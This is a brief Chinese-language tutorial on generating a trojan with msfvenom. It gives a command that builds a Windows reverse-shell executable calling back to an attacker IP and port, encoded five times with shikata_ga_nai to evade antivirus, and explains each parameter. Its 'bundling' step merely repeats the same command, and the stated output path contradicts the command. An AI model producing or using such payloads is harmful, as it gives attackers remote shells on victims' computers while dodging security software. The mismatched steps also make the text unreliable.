木马程序格式:jpg exe txt
生成木马
msfvenom -p windows/shell_reverse_tcp lhost=192.168.204.140 lport=8080 -e x86/shikata_ga_nai -i 5 -f exe -o /root/3.exe
捆绑木马
msfvenom -p windows/shell_reverse_tcp lhost=192.168.204.140 lport=8080 -e x86/shikata_ga_nai -i 5 -f exe -o /root/3.exe
参数解释:
msfvenom -p windows/shell_reverse_tcp:意为使用shell_reverse_tcp攻击载荷
lhost=192.168.204.140:设置攻击者IP地址
lport=8080:设置木马将会主动连接攻击者设定的监听端口
-e x86/shikata_ga_nai:使用shikata_ga_nai的编码方式对攻击载荷进行重新编码
-i 5:使用刚才的设定的编码方式对目标进行5次编码(多次编码理论上来讲有助于免杀,但是也不一定,毕竟杀软不是白收费的,免杀技术飞速发展,新的免杀技术一出现就会被各大安全厂商盯上的……)
-f exe:指定MSF编码器输出格式为exe
-o /root/Desktop/Everything.exe:指定处理完毕后的文件输出路径